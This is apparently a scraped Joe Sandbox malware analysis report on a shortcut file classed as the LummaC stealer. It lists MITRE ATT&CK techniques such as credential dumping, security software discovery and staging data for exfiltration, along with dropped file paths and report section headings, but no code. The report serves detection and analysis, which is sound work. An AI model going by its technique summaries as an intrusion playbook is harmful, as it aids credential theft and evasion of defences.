Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report d2W4YpqsKg.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivvrssih.kvp.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xe0rhmb3.dz4.psm1

C:\Users\user\AppData\Local\Temp\putty.exe

C:\Users\user\Documents\adv.ps1

Static File Info

General

File Icon

Static Windows Shortcut Info

General

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
d2W4YpqsKg.lnk

Function 00007FFB10EB1348 Relevance: 3.0, Strings: 2, Instructions: 490
COMMON

Function 00007FFB11505623 Relevance: 2.2, Strings: 1, Instructions: 923
COMMON

Function 00007FFB10EC1F7B Relevance: 1.9, Instructions: 1940
COMMON

Function 00007FFB10EB2BBA Relevance: 1.7, APIs: 1, Instructions: 229
COMMON

Function 00007FFB1115059D Relevance: 1.7, Strings: 1, Instructions: 483
COMMON

Function 00007FFB10EB7D0A Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Function 00007FFB10EB7CF9 Relevance: 1.6, APIs: 1, Instructions: 78
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre